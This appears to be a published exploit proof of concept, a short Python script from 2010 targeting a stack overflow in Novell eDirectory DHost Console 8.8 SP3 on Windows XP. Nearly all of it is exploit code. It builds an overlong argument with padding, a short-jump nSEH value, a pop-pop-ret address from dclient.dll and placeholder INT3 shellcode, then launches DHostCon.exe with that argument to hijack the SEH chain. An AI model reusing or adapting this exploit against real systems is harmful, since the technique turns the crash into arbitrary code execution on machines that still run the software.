33 lines
No EOL
939 B
Python
Executable file
33 lines
No EOL
939 B
Python
Executable file
# Exploit Title: Novel eDirectory DHost Console 8.8 SP3 Local SEH Overwrite
|
|
# Date: 17/10/2010
|
|
# Author: d0lc3 (@rmallof - http://elotrolad0.blogspot.com/)
|
|
# Software Link: http://www.novell.com/
|
|
# Version: 8.8 SP3 (20216.67)]
|
|
# Tested on: win32 xp sp3 (spa)
|
|
|
|
#Summary:
|
|
# DHostCon.exe is prone to local denial of service caused by stack overflow
|
|
# triggered if user-supplied parameters are too long (1074 bytes).
|
|
# Due nature of this vulnerabilty, attackers could exploit this issue
|
|
# to execute arbitrary code on local host.
|
|
|
|
#PoC:
|
|
|
|
#!/usr/bin/python
|
|
import os,struct
|
|
|
|
def main():
|
|
path="C:\Novell\NDS\dhostcon.exe"
|
|
args="x.x.x.x" #ip server
|
|
buf="A"*1065
|
|
nseh=struct.pack("<L",0x90909eeb) #jmp short 0012ff50 +NOP + NOP
|
|
seh=struct.pack("<L",0x61012c20) #PPR dclient.dll
|
|
|
|
shellcode=struct.pack("<B",0xCC) #INT3
|
|
|
|
crash=buf+shellcode+nseh+seh
|
|
|
|
os.system(path+" "+args+" "+crash) #Crash!
|
|
|
|
if __name__=="__main__":
|
|
main() |